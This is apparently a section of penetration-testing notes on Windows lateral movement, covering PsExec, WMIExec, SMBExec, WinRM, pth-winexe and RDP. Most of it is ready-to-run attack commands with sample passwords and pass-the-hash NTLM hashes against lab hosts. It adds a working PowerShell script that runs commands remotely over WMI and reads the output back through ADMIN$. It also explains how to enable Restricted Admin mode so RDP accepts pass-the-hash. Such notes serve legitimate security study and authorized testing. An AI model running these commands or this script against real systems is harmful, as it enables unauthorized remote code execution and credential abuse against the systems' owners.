
Remote Shells

23.2.1 - PsExec

Requires local admin on the target plus SMB (TCP 445) with a writable admin share (ADMIN$, or C$ as fallback): the tool drops a service binary on the share and starts it through the Service Control Manager, so every run leaves a "service installed" event (System log 7045) behind.

impacket-psexec administrator:<password>@afcr-dc.afc-richmond.local cmd.exe
impacket-psexec <domain>/administrator:<password>@<target> cmd.exe
.\PsExec64.exe \\<target> -u corp\jen -p Password123 cmd
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:8c802621d2e36fc074345dded890f3e5 Admin@192.168.129.59
impacket-psexec -hashes lm:ntlm zenservice@192.168.183.170
proxychains impacket-psexec USERC:USERCishere@10.11.1.50 cmd.exe

23.2.2 - WMIExec & WMI

WMI (Windows Management Instrumentation) is a core Windows feature that allows remote and local interaction with system components — like services, processes, registry, and hardware — through a standardised interface. It's part of Microsoft's implementation of Web-Based Enterprise Management (WBEM), which uses the CIM (Common Information Model) schema.

Requirements: local admin on the target; DCOM reachable (TCP 135 plus a dynamic RPC port) for the Win32_Process.Create call that spawns the command; and SMB (TCP 445) with the ADMIN$ share available, because each command's stdout/stderr is redirected to a file under ADMIN$ and read back over SMB. Pass -nooutput to skip the SMB part when you don't need to see results. Any account that is local admin on a default build meets this. Processes spawned this way have WmiPrvSE.exe as their parent.

impacket-wmiexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
impacket-wmiexec <domain_name>/<user_name>@<remote_hostname> 
impacket-wmiexec Administrator@[target] -hashes [LM]:[NT/NTLM]
impacket-wmiexec Administrator@10.11.1.22 -hashes :ee12345067801f38115019ca2fb
(LM half left empty before the colon when only the NT hash is known)

Execute a command via WMI from a Windows host (PowerShell; -ComputerName makes it remote, drop it to run locally)

Invoke-WmiMethod -Class Win32_Process -Name Create -ComputerName <target> -Credential (Get-Credential) -ArgumentList "cmd.exe"

Legacy WMIC command (wmic.exe is deprecated and absent on newer Windows 11 builds)

wmic /node:<target> /user:<user> /password:<pass> process call create "cmd.exe"
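Added example (not from the original notes): the same WMI execute-and-collect loop that impacket-wmiexec performs, written in PowerShell for when you already have a Windows foothold. It shows why the section above lists both DCOM and SMB/ADMIN$ as requirements: Win32_Process.Create goes over DCOM, the output comes back over the share. Target name afcr-ws01 and the command are placeholders.

```powershell
# Added example, not part of the original page. Remote execution via CIM over DCOM,
# output collected through ADMIN$ (what impacket-wmiexec does under the hood).
# Assumed placeholders: target 'afcr-ws01', a local-admin credential entered at the prompt.
param(
    [string]$Target  = 'afcr-ws01',
    [string]$Command = 'whoami /all'
)

$cred = Get-Credential -Message "Local admin on $Target"

# Classic WMI path = DCOM (TCP 135 + dynamic RPC port). WSMan would need WinRM instead.
$opt  = New-CimSessionOption -Protocol Dcom
$sess = New-CimSession -ComputerName $Target -Credential $cred -SessionOption $opt

# Unique output file inside C:\Windows, which is what the ADMIN$ share exposes.
$outFile = "__{0}" -f [DateTimeOffset]::UtcNow.ToUnixTimeSeconds()
$cmdLine = "cmd.exe /Q /c $Command 1> C:\Windows\$outFile 2>&1"

$r = Invoke-CimMethod -CimSession $sess -ClassName Win32_Process -MethodName Create `
        -Arguments @{ CommandLine = $cmdLine }

# Win32_Process.Create: 0 = success, 2 = access denied, 3 = insufficient privilege, 9 = path not found
if ($r.ReturnValue -ne 0) { throw "Win32_Process.Create failed with code $($r.ReturnValue)" }
Write-Host "Spawned PID $($r.ProcessId) on $Target (parent will be WmiPrvSE.exe)"

# Poll until the cmd.exe wrapper exits, i.e. the output file is complete.
do {
    Start-Sleep -Milliseconds 500
    $alive = Get-CimInstance -CimSession $sess -ClassName Win32_Process `
                 -Filter "ProcessId = $($r.ProcessId)"
} while ($alive)

# Pull the output over SMB with the same credential, then clean up the artefact.
New-PSDrive -Name T -PSProvider FileSystem -Root "\\$Target\ADMIN$" -Credential $cred | Out-Null
Get-Content "T:\$outFile"
Remove-Item "T:\$outFile"
Remove-PSDrive -Name T
Remove-CimSession $sess
```

If SMB is blocked but DCOM is open, drop the New-PSDrive/Get-Content part and run blind (the equivalent of -nooutput); the process still executes, you just don't get the results back.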

23.2.3 - SMBExec

No binary is dropped: each command is wrapped in a throwaway service whose binpath runs it through cmd.exe, output goes to a file on a writable share (C$ by default) and the service is deleted afterwards. Same prerequisites as PsExec (local admin, TCP 445, writable share), but noisier: one 7045 event per command.

impacket-smbexec <domain_name>/<user_name>@<remote_hostname> -k -no-pass
impacket-smbexec <domain_name>/<user_name>@<remote_hostname> 

23.2.4 - WinRM

WinRM listens on TCP 5985 (HTTP) / 5986 (HTTPS). The account must be a local admin or a member of the Remote Management Users group on the target.

evil-winrm -u <user> -p <password> -i 172.16.138.83
evil-winrm -u <user> -H <hash> -i 172.16.138.83

Secure (HTTPS) mode, TCP 5986 (use -P to override the port if the listener is elsewhere)

evil-winrm -u <user> -H <hash> -i 172.16.138.83 -S

23.2.5 - pth-winexe

pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
(--system elevates the shell to NT AUTHORITY\SYSTEM; the LM:NT pair follows the % sign)

23.2.6 - RDP

rdesktop -u 'USERN' -p 'abc123//' 192.168.129.59 -g 94% -d example
xfreerdp /v:10.1.1.89 /u:USERX /pth:5e22b03be2cnzxlcjei9cxzc9x
Pass-the-hash over RDP only works if Restricted Admin mode is enabled on the target (HKLM\System\CurrentControlSet\Control\Lsa\DisableRestrictedAdmin = 0). It is off by default, so with local admin you may have to set it first, e.g. via one of the remote-exec methods above.
xfreerdp /cert-ignore /bpp:8 /compression -themes -wallpaper /auto-reconnect /h:1000 /w:1600 /v:192.168.238.191 /u:admin /p:password
xfreerdp /u:admin  /v:192.168.238.191 /cert:ignore /p:"password"  /timeout:20000 /drive:home,/tmp